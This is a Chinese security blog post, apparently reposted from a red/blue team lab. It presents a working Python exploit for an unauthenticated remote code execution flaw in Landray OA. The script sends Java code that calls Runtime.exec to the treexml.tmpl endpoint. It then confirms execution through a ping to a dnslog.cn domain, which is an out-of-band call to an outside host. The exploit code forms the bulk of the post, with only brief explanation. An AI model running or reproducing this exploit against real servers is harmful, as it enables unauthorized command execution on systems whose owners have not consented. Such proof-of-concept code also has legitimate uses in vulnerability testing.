简单poc编写采用最近的蓝凌未授权rce(python)
这里我们借助burp的辅助工具 去帮我们构造前期的请求包 只需要专注逻辑处理这里就可以用python对这个包发起请求好了 不废话 上正文蓝凌未授权rce pocimport 2022-8-7 15:47:25 Author: 红蓝攻防实验室(查看原文) 阅读量:168 收藏
这里我们借助burp的辅助工具 去帮我们构造前期的请求包 只需要专注逻辑处理这里就可以用python对这个包发起请求好了 不废话 上正文蓝凌未授权rce pocimport 2022-8-7 15:47:25 Author: 红蓝攻防实验室(查看原文) 阅读量:168 收藏
这里我们借助burp的辅助工具 去帮我们构造前期的请求包 只需要专注逻辑处理
这里就可以用python对这个包发起请求
好了 不废话 上正文
蓝凌未授权rce poc
import argparseimport sysimport requestsimport timeimport randomdef random_str(n):str = ''for i in range(n):str += chr(random.randint(97, 122))return strcookie = random_str(26)headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1","User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:100.0) Gecko/20000101 Firefox/100.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}def get_domain_or_check(type):if type == 1:url = "http://www.dnslog.cn:80/getdomain.php"cookies = {"PHPSESSID": cookie}res = requests.get(url, headers=headers, cookies=cookies)print("[+] dnslog:" + res.text)return res.textelif type == 2:url = "http://dnslog.cn:80/getrecords.php?t=0.18836534176098696"cookies = {"PHPSESSID": cookie}time.sleep(0.8)res = requests.get(url, headers=headers, cookies=cookies)if len(res.text) > 2:print("[+] Success 漏洞存在: " + res.text)else:print("[+] 漏洞不存在")def test(url):cmd = "ping " + get_domain_or_check(1)headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36","Connection": "close", "Accept": "*/*", "Accept-Language": "en","Content-Type": "application/x-www-form-urlencoded", "Pragma": "no-cache", "Accept-Encoding": "gzip, deflate"}data = {"s_bean": "ruleFormulaValidate", "script": "try {String cmd = \"" + str(cmd) + "\";Process process = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}"}if url[-1] != "/":url = url + "/data/sys-common/treexml.tmpl"else:url = url + "data/sys-common/treexml.tmpl"res = requests.post(url, headers=headers, data=data)if res.status_code == 200:get_domain_or_check(2)else:print("[+] 状态码" + str(res.status_code) + " 漏洞不存在")def parse_args():parser = argparse.ArgumentParser(epilog="\tExample: \r\npython " + sys.argv[0] + " -u target")parser._optionals.title = "OPTIONS"parser.add_argument('-u', '--url', help="url.", required=True, type=str)return parser.parse_args()if __name__ == '__main__':print("\033[1;32mAuthor: by567 暗\033[0m")args = parse_args()url = args.urltest(url)
这里分析了 dnslog的getdomain.php和getrecords.php来获取dnslog测试结果
通过getdomain.php获取测试dnslog 这里PHPSESSID设置我们构造的这样获取结果才能获取到
接着就是 发起请求 对数据包进行分析处理
代码写的比较low 大佬勿喷
文章来源: http://mp.weixin.qq.com/s?__biz=MzU2OTkwNzIxOA==&mid=2247483952&idx=1&sn=019733f010b3e8ddc090a8285521fa59&chksm=fcf6c34dcb814a5b1274b5a6895e0b282abcd77993efb896fb00a0f2e89ae26fce9018ec6e1f#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh